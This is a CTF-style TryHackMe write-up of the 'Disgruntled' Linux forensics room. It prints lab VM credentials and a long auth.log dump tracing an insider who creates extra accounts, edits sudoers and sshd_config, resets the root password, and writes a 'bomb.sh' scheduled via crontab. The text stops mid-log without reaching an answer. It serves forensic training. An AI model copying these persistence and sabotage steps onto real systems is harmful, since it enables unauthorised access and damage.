TryHackMe | Disgruntled | Write-Up

The Disgruntled room hosted by TryHackMe challenges to check what a culprit did on a server. More details can be found here: https://tryhackme.com/room/disgruntled


Task 1 – Introduction

Hey, kid! Good, you’re here!

Not sure if you’ve seen the news, but an employee from the IT department of one of our clients (CyberT) got arrested by the police. The guy was running a successful phishing operation as a side gig.

CyberT wants us to check if this person has done anything malicious to any of their assets. Get set up, grab a cup of coffee, and meet me in the conference room.

Connecting to the machine

Start the virtual machine in split-screen view by clicking on the green “Start Machine” button on the upper right section of this task. Alternatively, you can connect to the VM using the credentials below via “ssh”.

Usernameroot
Passwordpassword
IP10.10.144.223
Credentials for the VM

I used TryHackMe’s AttackBox to solve this room.

Grab a cup of coffee.

Answer: none


Task 2 – Linux Forensics review

Pre-requisites
This room requires basic knowledge of Linux and is based on the Linux Forensics room. A cheat sheet is attached below, which you can also download by clicking on the blue Download Task Files button on the right.

Note: Is the cheatsheet not showing in Firefox? Check your settings for PDF files in Firefox. The file might have already been downloaded automatically.

Well, you may download the PDF if you want to. I didn’t.

Take a sip of coffee.

Answer: none


Task 3 – Nothing suspicious… So far

Here’s the machine our disgruntled IT user last worked on. Check if there’s anything our client needs to be worried about.

My advice: Look at the privileged commands that were run. That should get you started.

This is where the actual investigation starts.

The user installed a package on the machine using elevated privileges. According to the logs, what is the full COMMAND?

To investigate the logs, I used cat /var/log/auth.log to see everything that was done on the server using elevated privileges. The output can be seen below.

Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: new group: name=ubuntu, GID=1000
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: new user: name=ubuntu, UID=1000, GID=1000, home=/home/ubuntu, shell=/bin/bash
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to group 'adm'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to group 'dialout'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to group 'cdrom'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to group 'floppy'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to group 'sudo'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to group 'audio'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to group 'dip'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to group 'video'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to group 'plugdev'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to group 'lxd'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to group 'netdev'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to shadow group 'adm'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to shadow group 'dialout'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to shadow group 'cdrom'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to shadow group 'floppy'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to shadow group 'sudo'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to shadow group 'audio'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to shadow group 'dip'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to shadow group 'video'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to shadow group 'plugdev'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to shadow group 'lxd'
Dec 22 07:56:12 ip-10-10-158-38 useradd[1000]: add 'ubuntu' to shadow group 'netdev'
Dec 22 07:56:12 ip-10-10-158-38 passwd[1007]: password for 'ubuntu' changed by 'root'
Dec 22 07:56:12 ip-10-10-158-38 systemd-logind[1065]: Watching system buttons on /dev/input/event0 (Power Button)
Dec 22 07:56:12 ip-10-10-158-38 systemd-logind[1065]: Watching system buttons on /dev/input/event1 (Sleep Button)
Dec 22 07:56:12 ip-10-10-158-38 systemd-logind[1065]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Dec 22 07:56:12 ip-10-10-158-38 systemd-logind[1065]: New seat seat0.
Dec 22 07:56:12 ip-10-10-158-38 sshd[1197]: Server listening on 0.0.0.0 port 22.
Dec 22 07:56:12 ip-10-10-158-38 sshd[1197]: Server listening on :: port 22.
Dec 22 07:56:15 ip-10-10-158-38 systemd-logind[1065]: Watching system buttons on /dev/input/event1 (Sleep Button)
Dec 22 07:56:15 ip-10-10-158-38 systemd-logind[1065]: Watching system buttons on /dev/input/event0 (Power Button)
Dec 22 07:56:15 ip-10-10-158-38 systemd-logind[1065]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Dec 22 07:56:20 ip-10-10-158-38 sshd[1473]: Accepted publickey for ubuntu from 10.14.35.192 port 59338 ssh2: RSA SHA256:mECLK63REDIo/bpErKKpNswWNQsYM1MkDVU7DHD+GIY
Dec 22 07:56:20 ip-10-10-158-38 sshd[1473]: pam_unix(sshd:session): session opened for user ubuntu by (uid=0)
Dec 22 07:56:20 ip-10-10-158-38 systemd-logind[1065]: New session 1 of user ubuntu.
Dec 22 07:56:20 ip-10-10-158-38 systemd: pam_unix(systemd-user:session): session opened for user ubuntu by (uid=0)
Dec 22 07:56:27 ip-10-10-158-38 sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/date -s last year
Dec 22 07:56:27 ip-10-10-158-38 sudo: pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)
Dec 22 07:56:27 ip-10-10-158-38 sudo: pam_unix(sudo:session): session closed for user root
Dec 22 07:56:36 ip-10-10-158-38 sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/nano /etc/ssh/sshd_config
Dec 22 07:56:36 ip-10-10-158-38 sudo: pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)
Dec 22 07:56:43 ip-10-10-158-38 sudo: pam_unix(sudo:session): session closed for user root
Dec 22 07:57:45 ip-10-10-158-38 sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/systemctl restart ssh
Dec 22 07:57:45 ip-10-10-158-38 sudo: pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)
Dec 22 07:57:45 ip-10-10-158-38 sshd[1197]: Received signal 15; terminating.
Dec 22 07:57:45 ip-10-10-158-38 sshd[1968]: Server listening on 0.0.0.0 port 22.
Dec 22 07:57:45 ip-10-10-158-38 sshd[1968]: Server listening on :: port 22.
Dec 22 07:57:45 ip-10-10-158-38 sudo: pam_unix(sudo:session): session closed for user root
Dec 22 07:58:09 ip-10-10-158-38 sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/sbin/useradd -m cybert -s /bin/bash
Dec 22 07:58:09 ip-10-10-158-38 sudo: pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)
Dec 22 07:58:09 ip-10-10-158-38 useradd[1970]: new group: name=cybert, GID=1001
Dec 22 07:58:09 ip-10-10-158-38 useradd[1970]: new user: name=cybert, UID=1001, GID=1001, home=/home/cybert, shell=/bin/bash
Dec 22 07:58:09 ip-10-10-158-38 sudo: pam_unix(sudo:session): session closed for user root
Dec 22 07:58:14 ip-10-10-158-38 sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/bin/passwd cybert
Dec 22 07:58:14 ip-10-10-158-38 sudo: pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)
Dec 22 07:58:21 ip-10-10-158-38 passwd[1977]: pam_unix(passwd:chauthtok): password changed for cybert
Dec 22 07:58:21 ip-10-10-158-38 sudo: pam_unix(sudo:session): session closed for user root
Dec 22 07:58:24 ip-10-10-158-38 sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/sbin/visudo
Dec 22 07:58:24 ip-10-10-158-38 sudo: pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)
Dec 22 07:58:32 ip-10-10-158-38 sudo: pam_unix(sudo:session): session closed for user root
Dec 22 07:58:42 ip-10-10-158-38 su[1981]: Successful su for cybert by ubuntu
Dec 22 07:58:42 ip-10-10-158-38 su[1981]: + /dev/pts/0 ubuntu:cybert
Dec 22 07:58:42 ip-10-10-158-38 su[1981]: pam_unix(su:session): session opened for user cybert by ubuntu(uid=1000)
Dec 22 07:58:42 ip-10-10-158-38 su[1981]: pam_systemd(su:session): Cannot create session: Already running in a session
Dec 22 07:58:48 ip-10-10-158-38 su[1981]: pam_unix(su:session): session closed for user cybert
Dec 22 07:58:50 ip-10-10-158-38 sshd[1879]: Received disconnect from 10.14.35.192 port 59338:11: disconnected by user
Dec 22 07:58:50 ip-10-10-158-38 sshd[1879]: Disconnected from user ubuntu 10.14.35.192 port 59338
Dec 22 07:58:50 ip-10-10-158-38 sshd[1473]: pam_unix(sshd:session): session closed for user ubuntu
Dec 22 07:58:50 ip-10-10-158-38 systemd-logind[1065]: Removed session 1.
Dec 22 07:59:04 ip-10-10-158-38 sshd[2008]: Accepted password for cybert from 10.14.35.192 port 60512 ssh2
Dec 22 07:59:04 ip-10-10-158-38 sshd[2008]: pam_unix(sshd:session): session opened for user cybert by (uid=0)
Dec 22 07:59:04 ip-10-10-158-38 systemd: pam_unix(systemd-user:session): session opened for user cybert by (uid=0)
Dec 22 07:59:04 ip-10-10-158-38 systemd-logind[1065]: New session 3 of user cybert.
Dec 22 07:59:18 ip-10-10-158-38 sshd[2093]: Received disconnect from 10.14.35.192 port 60512:11: disconnected by user
Dec 22 07:59:18 ip-10-10-158-38 sshd[2093]: Disconnected from user cybert 10.14.35.192 port 60512
Dec 22 07:59:18 ip-10-10-158-38 sshd[2008]: pam_unix(sshd:session): session closed for user cybert
Dec 22 07:59:18 ip-10-10-158-38 systemd-logind[1065]: Removed session 3.
Dec 22 07:59:24 ip-10-10-158-38 systemd-logind[1065]: Power key pressed.
Dec 22 07:59:24 ip-10-10-158-38 systemd-logind[1065]: System is powering down.
Dec 28 06:17:00 ip-10-10-168-55 passwd[794]: password for 'ubuntu' changed by 'root'
Dec 28 06:17:00 ip-10-10-168-55 systemd-logind[827]: Watching system buttons on /dev/input/event0 (Power Button)
Dec 28 06:17:00 ip-10-10-168-55 systemd-logind[827]: Watching system buttons on /dev/input/event1 (Sleep Button)
Dec 28 06:17:00 ip-10-10-168-55 systemd-logind[827]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Dec 28 06:17:00 ip-10-10-168-55 systemd-logind[827]: New seat seat0.
Dec 28 06:17:00 ip-10-10-168-55 sshd[881]: Server listening on 0.0.0.0 port 22.
Dec 28 06:17:00 ip-10-10-168-55 sshd[881]: Server listening on :: port 22.
Dec 28 06:17:15 ip-10-10-168-55 systemd-logind[827]: Watching system buttons on /dev/input/event0 (Power Button)
Dec 28 06:17:15 ip-10-10-168-55 systemd-logind[827]: Watching system buttons on /dev/input/event1 (Sleep Button)
Dec 28 06:17:15 ip-10-10-168-55 systemd-logind[827]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Dec 28 06:17:15 ip-10-10-168-55 sshd[1484]: Accepted password for cybert from 10.14.35.192 port 49420 ssh2
Dec 28 06:17:15 ip-10-10-168-55 sshd[1484]: pam_unix(sshd:session): session opened for user cybert by (uid=0)
Dec 28 06:17:15 ip-10-10-168-55 systemd: pam_unix(systemd-user:session): session opened for user cybert by (uid=0)
Dec 28 06:17:15 ip-10-10-168-55 systemd-logind[827]: New session 1 of user cybert.
Dec 28 06:17:30 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:17:30 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:17:30 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:18:12 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/rm /var/lib/dpkg/lock
Dec 28 06:18:12 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:18:12 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:18:17 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/dpkg --configure -a
Dec 28 06:18:17 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:18:17 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:18:33 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/lsof /var/lib/dpkg/lock
Dec 28 06:18:33 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:18:33 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:18:36 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/lsof /var/lib/dpkg/lock-frontend
Dec 28 06:18:36 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:18:36 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:18:47 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/rm /var/lib/dpkg/lock-frontend
Dec 28 06:18:47 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:18:47 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:18:52 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/dpkg --configure -a
Dec 28 06:18:52 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:18:52 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:19:01 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:19:01 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:19:46 ip-10-10-168-55 groupadd[3556]: group added to /etc/group: name=ssl-cert, GID=115
Dec 28 06:19:46 ip-10-10-168-55 groupadd[3556]: group added to /etc/gshadow: name=ssl-cert
Dec 28 06:19:46 ip-10-10-168-55 groupadd[3556]: new group: name=ssl-cert, GID=115
Dec 28 06:20:30 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:20:46 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/chown www-data:www-data /usr/share/dokuwiki
Dec 28 06:20:46 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:20:46 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:20:55 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/chown www-data:www-data /usr/share/dokuwiki/VERSION /usr/share/dokuwiki/bin /usr/shar
e/dokuwiki/doku.php /usr/share/dokuwiki/feed.php /usr/share/dokuwiki/inc /usr/share/dokuwiki/index.php /usr/share/dokuwiki/install.php /usr/share/dokuwiki/lib /usr/share/dokuwiki/vendor -R
Dec 28 06:20:55 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:20:55 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:21:05 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/chown www-data:www-data /var/lib/dokuwiki
Dec 28 06:21:05 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:21:05 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:21:14 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/chown www-data:www-data /var/lib/dokuwiki/acl /var/lib/dokuwiki/data /var/lib/dokuwik
i/inc /var/lib/dokuwiki/lib -R
Dec 28 06:21:14 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:21:14 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:21:20 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/ln -s /var/lib/dokuwiki/data /usr/share/dokuwiki/data
Dec 28 06:21:20 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:21:21 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:21:28 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/ln -s /etc/dokuwiki/license.php /usr/share/dokuwiki/conf/license.php
Dec 28 06:21:28 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:21:28 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:22:12 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/nano /etc/apache2/sites-available/dokuwiki.conf
Dec 28 06:22:12 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:22:16 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:22:25 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/a2ensite dokuwiki
Dec 28 06:22:25 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:22:25 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:22:31 ip-10-10-168-55 polkitd(authority=local): Registered Authentication Agent for unix-process:15152:34618 (system bus name :1.18 [/usr/bin/pkttyagent --notify-fd 5 --fallback],
object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale C.UTF-8)
Dec 28 06:22:35 ip-10-10-168-55 polkitd(authority=local): Unregistered Authentication Agent for unix-process:15152:34618 (system bus name :1.18, object path /org/freedesktop/PolicyKit1/Authe
nticationAgent, locale C.UTF-8) (disconnected from bus)
Dec 28 06:22:35 ip-10-10-168-55 polkitd(authority=local): Operator of unix-process:15152:34618 FAILED to authenticate to gain authorization for action org.freedesktop.systemd1.manage-units f
or system-bus-name::1.19 [] (owned by unix-user:cybert)
Dec 28 06:22:37 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/systemctl reload apache2
Dec 28 06:22:37 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:22:37 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:25:01 ip-10-10-168-55 CRON[15180]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 28 06:25:07 ip-10-10-168-55 CRON[15180]: pam_unix(cron:session): session closed for user root
Dec 28 06:26:52 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/adduser it-admin
Dec 28 06:26:52 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:26:53 ip-10-10-168-55 groupadd[15324]: group added to /etc/group: name=it-admin, GID=1002
Dec 28 06:26:53 ip-10-10-168-55 groupadd[15324]: group added to /etc/gshadow: name=it-admin
Dec 28 06:26:53 ip-10-10-168-55 groupadd[15324]: new group: name=it-admin, GID=1002
Dec 28 06:26:53 ip-10-10-168-55 useradd[15328]: new user: name=it-admin, UID=1002, GID=1002, home=/home/it-admin, shell=/bin/bash
Dec 28 06:27:21 ip-10-10-168-55 passwd[15336]: pam_unix(passwd:chauthtok): password changed for it-admin
Dec 28 06:27:29 ip-10-10-168-55 chfn[15363]: changed user 'it-admin' information
Dec 28 06:27:31 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:27:34 ip-10-10-168-55 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/visudo
Dec 28 06:27:34 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:27:45 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:27:52 ip-10-10-168-55 su[15371]: Successful su for it-admin by cybert
Dec 28 06:27:52 ip-10-10-168-55 su[15371]: + /dev/pts/0 cybert:it-admin
Dec 28 06:27:52 ip-10-10-168-55 su[15371]: pam_unix(su:session): session opened for user it-admin by cybert(uid=1001)
Dec 28 06:27:52 ip-10-10-168-55 su[15371]: pam_systemd(su:session): Cannot create session: Already running in a session
Dec 28 06:29:14 ip-10-10-168-55 sudo: it-admin : TTY=pts/0 ; PWD=/home/it-admin ; USER=root ; COMMAND=/usr/bin/vi bomb.sh
Dec 28 06:29:14 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:29:52 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:30:10 ip-10-10-168-55 sudo: it-admin : TTY=pts/0 ; PWD=/home/it-admin ; USER=root ; COMMAND=/bin/nano /etc/crontab
Dec 28 06:30:10 ip-10-10-168-55 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:30:26 ip-10-10-168-55 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 06:30:45 ip-10-10-168-55 su[15371]: pam_unix(su:session): session closed for user it-admin
Dec 28 06:30:46 ip-10-10-168-55 sshd[1899]: Received disconnect from 10.14.35.192 port 49420:11: disconnected by user
Dec 28 06:30:46 ip-10-10-168-55 sshd[1899]: Disconnected from user cybert 10.14.35.192 port 49420
Dec 28 06:30:46 ip-10-10-168-55 sshd[1484]: pam_unix(sshd:session): session closed for user cybert
Dec 28 06:30:46 ip-10-10-168-55 systemd-logind[827]: Removed session 1.
Dec 28 06:31:04 ip-10-10-168-55 systemd-logind[827]: Power key pressed.
Dec 28 06:31:11 ip-10-10-168-55 systemd-logind[827]: System is powering down.
Dec 28 07:00:34 ip-10-10-117-219 passwd[779]: password for 'ubuntu' changed by 'root'
Dec 28 07:00:34 ip-10-10-117-219 systemd-logind[825]: Watching system buttons on /dev/input/event0 (Power Button)
Dec 28 07:00:34 ip-10-10-117-219 systemd-logind[825]: Watching system buttons on /dev/input/event1 (Sleep Button)
Dec 28 07:00:34 ip-10-10-117-219 systemd-logind[825]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Dec 28 07:00:34 ip-10-10-117-219 systemd-logind[825]: New seat seat0.
Dec 28 07:00:35 ip-10-10-117-219 sshd[893]: Server listening on 0.0.0.0 port 22.
Dec 28 07:00:35 ip-10-10-117-219 sshd[893]: Server listening on :: port 22.
Dec 28 07:01:09 ip-10-10-117-219 sshd[1244]: Accepted password for cybert from 10.14.35.192 port 42574 ssh2
Dec 28 07:01:09 ip-10-10-117-219 sshd[1244]: pam_unix(sshd:session): session opened for user cybert by (uid=0)
Dec 28 07:01:09 ip-10-10-117-219 systemd: pam_unix(systemd-user:session): session opened for user cybert by (uid=0)
Dec 28 07:01:09 ip-10-10-117-219 systemd-logind[825]: New session 1 of user cybert.
Dec 28 07:01:22 ip-10-10-117-219 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/passwd root
Dec 28 07:01:22 ip-10-10-117-219 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 07:01:28 ip-10-10-117-219 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 07:01:30 ip-10-10-117-219 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/passwd root
Dec 28 07:01:30 ip-10-10-117-219 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 07:01:36 ip-10-10-117-219 passwd[1434]: pam_unix(passwd:chauthtok): password changed for root
Dec 28 07:01:36 ip-10-10-117-219 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 07:01:56 ip-10-10-117-219 su[1436]: Successful su for root by cybert
Dec 28 07:01:56 ip-10-10-117-219 su[1436]: + /dev/pts/0 cybert:root
Dec 28 07:01:56 ip-10-10-117-219 su[1436]: pam_unix(su:session): session opened for user root by cybert(uid=1001)
Dec 28 07:01:56 ip-10-10-117-219 su[1436]: pam_systemd(su:session): Cannot create session: Already running in a session
Dec 28 07:01:57 ip-10-10-117-219 su[1436]: pam_unix(su:session): session closed for user root
Dec 28 07:01:58 ip-10-10-117-219 sshd[1416]: Received disconnect from 10.14.35.192 port 42574:11: disconnected by user
Dec 28 07:01:58 ip-10-10-117-219 sshd[1416]: Disconnected from user cybert 10.14.35.192 port 42574
Dec 28 07:01:58 ip-10-10-117-219 sshd[1244]: pam_unix(sshd:session): session closed for user cybert
Dec 28 07:01:58 ip-10-10-117-219 systemd-logind[825]: Removed session 1.
Dec 28 07:02:05 ip-10-10-117-219 systemd-logind[825]: Power key pressed.
Dec 28 07:02:05 ip-10-10-117-219 systemd-logind[825]: System is powering down.
Dec 28 07:11:21 ip-10-10-243-54 passwd[768]: password for 'ubuntu' changed by 'root'
Dec 28 07:11:21 ip-10-10-243-54 sshd[869]: Server listening on 0.0.0.0 port 22.
Dec 28 07:11:21 ip-10-10-243-54 sshd[869]: Server listening on :: port 22.
Dec 28 07:11:21 ip-10-10-243-54 systemd-logind[862]: Watching system buttons on /dev/input/event0 (Power Button)
Dec 28 07:11:21 ip-10-10-243-54 systemd-logind[862]: Watching system buttons on /dev/input/event1 (Sleep Button)
Dec 28 07:11:21 ip-10-10-243-54 systemd-logind[862]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Dec 28 07:11:21 ip-10-10-243-54 systemd-logind[862]: New seat seat0.
Dec 28 07:12:14 ip-10-10-243-54 sshd[1305]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.14.35.192 user=root
Dec 28 07:12:16 ip-10-10-243-54 sshd[1305]: Failed password for root from 10.14.35.192 port 38788 ssh2
Dec 28 07:12:17 ip-10-10-243-54 sshd[1305]: Connection closed by authenticating user root 10.14.35.192 port 38788 [preauth]
Dec 28 07:12:22 ip-10-10-243-54 sshd[1315]: Invalid user cybret from 10.14.35.192 port 60174
Dec 28 07:12:23 ip-10-10-243-54 sshd[1315]: Connection closed by invalid user cybret 10.14.35.192 port 60174 [preauth]
Dec 28 07:12:31 ip-10-10-243-54 sshd[1318]: Accepted password for cybert from 10.14.35.192 port 60188 ssh2
Dec 28 07:12:31 ip-10-10-243-54 sshd[1318]: pam_unix(sshd:session): session opened for user cybert by (uid=0)
Dec 28 07:12:31 ip-10-10-243-54 systemd: pam_unix(systemd-user:session): session opened for user cybert by (uid=0)
Dec 28 07:12:31 ip-10-10-243-54 systemd-logind[862]: New session 1 of user cybert.
Dec 28 07:12:39 ip-10-10-243-54 su[1469]: Successful su for root by cybert
Dec 28 07:12:39 ip-10-10-243-54 su[1469]: + /dev/pts/0 cybert:root
Dec 28 07:12:39 ip-10-10-243-54 su[1469]: pam_unix(su:session): session opened for user root by cybert(uid=1001)
Dec 28 07:12:39 ip-10-10-243-54 su[1469]: pam_systemd(su:session): Cannot create session: Already running in a session
Dec 28 07:12:52 ip-10-10-243-54 su[1469]: pam_unix(su:session): session closed for user root
Dec 28 07:14:07 ip-10-10-243-54 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/nano /etc/ssh/sshd_config
Dec 28 07:14:07 ip-10-10-243-54 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 07:14:19 ip-10-10-243-54 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 07:14:24 ip-10-10-243-54 polkitd(authority=local): Registered Authentication Agent for unix-process:1488:19924 (system bus name :1.15 [/usr/bin/pkttyagent --notify-fd 5 --fallback], o
bject path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale C.UTF-8)
Dec 28 07:14:26 ip-10-10-243-54 polkitd(authority=local): Unregistered Authentication Agent for unix-process:1488:19924 (system bus name :1.15, object path /org/freedesktop/PolicyKit1/Authen
ticationAgent, locale C.UTF-8) (disconnected from bus)
Dec 28 07:14:26 ip-10-10-243-54 polkitd(authority=local): Operator of unix-process:1488:19924 FAILED to authenticate to gain authorization for action org.freedesktop.systemd1.manage-units fo
r system-bus-name::1.16 [] (owned by unix-user:cybert)
Dec 28 07:14:27 ip-10-10-243-54 sudo: cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/service sshd restart
